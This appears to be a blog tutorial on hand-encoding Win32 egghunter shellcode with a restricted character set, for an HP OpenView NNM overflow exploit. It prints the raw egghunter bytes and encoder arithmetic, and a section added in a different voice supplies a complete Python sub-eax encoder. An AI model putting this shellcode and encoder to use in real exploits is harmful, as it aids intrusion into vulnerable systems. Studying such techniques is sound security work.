You are probably wondering what this post is all about. Well, it's about manually encoding egghunter shellcode.
Why would you want to manually encode the shellcode when you have built-in encoders in the Metasploit framework?
Before we begin, have a look at the following exploit by muts: HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit.
I won't go into much detail about the process because most of it has already been discussed in the Offensive Security HP NNM 0day presentation, and on Peter Van Eeckhoutte's blog in Exploit writing tutorial part 8: Win32 Egg Hunting, in the "Hand-crafting the encoder" and "Seeing this code run and reproduce the original egghunter is nice, but how can you build your own decoder?" sections of the tutorial.
What I'm about to show here are the calculations made so that our shellcode is free of bad characters; doing it manually can be a pain.
Due to the large number of bad characters, we need to manually encode the egghunter using a limited set of allowed characters. Using Python, we can have a script do the calculations for us.
Again, I assume you watched the Offsec video and read the tutorials, and already know what we are about to do here.
Detailed information about egghunters can be found in this document by skape:
1. Get the egghunter source code here: http://www.hick.org/code/skape/shellcode/win32/
or get them compiled to binaries here:
2. Generate the egghunter shellcode:
C:\>egghunt.exe cstyle 0x57303054
// 32 byte egghunt shellcode (egg=0x57303054)
unsigned char egghunt = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
3. Break our 32-byte egghunter shellcode into 8 sets of 4 bytes:
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30"
"\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"
4. We will use the second set, "\x0f\x42\x52\x6a" (0x6a52420f when read as a little-endian dword), as an example:
0xFFFFFFFF - 0x6a52420f + 1 = 0x95ADBDF1
We need to find three numbers, made up only of bytes from the allowed character set, which add up to 0x95ADBDF1.
Instead of calculating this manually, we will use a custom-made Python script.
Now let's split it in two, 95AD and BDF1, and feed these values into our script:
* The script contains a list of allowed chars and uses it for its calculations.
exploit~#python encoder.py
Usage: encoder.py <hex value>
exploit~#python encoder.py 95AD
Got It!! 0x7f7f 0x152d 0x0101
exploit~#python encoder.py BDF1
Got It!! 0x7f7f 0x3d71 0x0101
Combining the two halves gives: 7f7f7f7f 152d3d71 01010101
Let's add our results and voilà, we now have values made only from the allowed char set:
7f7f7f7f + 152d3d71 + 01010101 = 0x95ADBDF1
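As an added example (not the post's encoder.py, whose allowed-character list is not shown here), the following Python does the same search byte by byte with carry handling, so it also covers halves whose sum would not fit in 16 bits, and checks every result by simulating the sub eax decoder; the allowed set 0x01-0x7f is an assumption, so its three values differ from the ones above but sum to the same 0x95ADBDF1.

```python
# Added example: three-term "sub" encoder for the egghunter chunks. Find
# v1, v2, v3 built only from allowed bytes with v1+v2+v3 == -chunk mod 2**32;
# the decoder then runs eax = 0; sub eax, v1; sub eax, v2; sub eax, v3; push eax.
import struct
from itertools import product
ALLOWED = list(range(0x01, 0x80))  # assumed allowed set; the post's list is not shown
EGGHUNTER = bytes.fromhex(        # the post's 32-byte egghunter, egg = 0x57303054
    "6681caff0f42526a0258cd2e3c055a74efb8543030578bfaaf75eaaf75e7ffe7")

def _pick_bytes(target_bytes, allowed, pos=0, carry=0):
    """Choose (a, b, c) per byte, LSB first, carrying into the next byte and
    backtracking if a later byte has no fit; carry out of the top byte is
    dropped because the 32-bit subtraction wraps anyway."""
    if pos == len(target_bytes):
        return []
    allowed_set, want = set(allowed), target_bytes[pos]
    for a, b in product(allowed, repeat=2):
        c = (want - a - b - carry) & 0xFF      # the only c that fits mod 256
        if c in allowed_set:
            rest = _pick_bytes(target_bytes, allowed, pos + 1,
                               (a + b + c + carry) >> 8)
            if rest is not None:
                return [(a, b, c)] + rest
    return None

def encode_chunk(chunk, allowed=ALLOWED):
    """Return (target, [v1, v2, v3]); target is 0xFFFFFFFF - chunk + 1."""
    value = struct.unpack("<I", chunk)[0]          # chunk as a little-endian dword
    target = (-value) & 0xFFFFFFFF
    picks = _pick_bytes(target.to_bytes(4, "little"), allowed)
    if picks is None:
        raise ValueError("no three-term solution with this allowed set")
    return target, [int.from_bytes(bytes(p[i] for p in picks), "little")
                    for i in range(3)]

def simulate_decoder(vals):
    """The dword that `push eax` writes after eax = 0 minus each value."""
    eax = 0
    for v in vals:
        eax = (eax - v) & 0xFFFFFFFF
    return struct.pack("<I", eax)

def encode_shellcode(code=EGGHUNTER, allowed=ALLOWED):
    """Encode every 4-byte chunk and check that each decodes back."""
    result = []
    for i in range(0, len(code), 4):
        chunk = code[i:i + 4]
        target, vals = encode_chunk(chunk, allowed)
        assert simulate_decoder(vals) == chunk
        result.append((chunk, target, vals))
    return result
```

The decoder pushes the chunks last-to-first so the rebuilt egghunter grows upward on the stack; the three values for each chunk come from encode_shellcode() in original order.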
*** Special thanks to shatun for helping me by translating my needs into code ***